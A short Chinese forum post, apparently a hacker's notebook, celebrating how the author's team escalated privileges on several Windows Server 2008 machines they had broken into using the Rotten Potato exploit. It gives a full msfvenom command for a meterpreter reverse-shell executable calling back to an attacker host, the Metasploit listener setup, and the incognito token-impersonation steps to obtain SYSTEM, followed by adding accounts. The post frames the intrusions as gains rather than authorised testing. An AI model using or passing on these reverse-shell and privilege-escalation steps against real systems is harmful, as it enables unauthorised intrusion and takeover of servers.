|
这两天团队一直在一起日站,碰到了很多08的服务器。各种exp打下来不是没权限就是打上了补丁,然后东哥和Si试了下这个MS16-067也就是烂土豆,然后喜加好几台服务器。美滋滋。这篇文章就是记个笔记。
生成反弹木马命令
[pre]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe
[/pre]
反弹到的主机地址为192.168.1.33,端口为4433,生成的木马文件为4433.exe
将4433.exe上传到需要提权的目标服务器上
msfconsole下监听
[pre]
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33 //实际情况中需要将192.168.1.33换成公网IP地址
set LPORT 4433
exploit
[/pre]
在shell里运行4433.exe
然后msf会收到一个session
这时候我们传上去potato.exe也就是我们的烂土豆,在这里下载
[pre]
use incognito
list_tokens -u //列出tokens
execute -cH -f ./potato.exe //执行exp
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM" //提权
[/pre]
劫持到system的令牌就舒服了,然后就是一顿net user,最后喜加一!
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|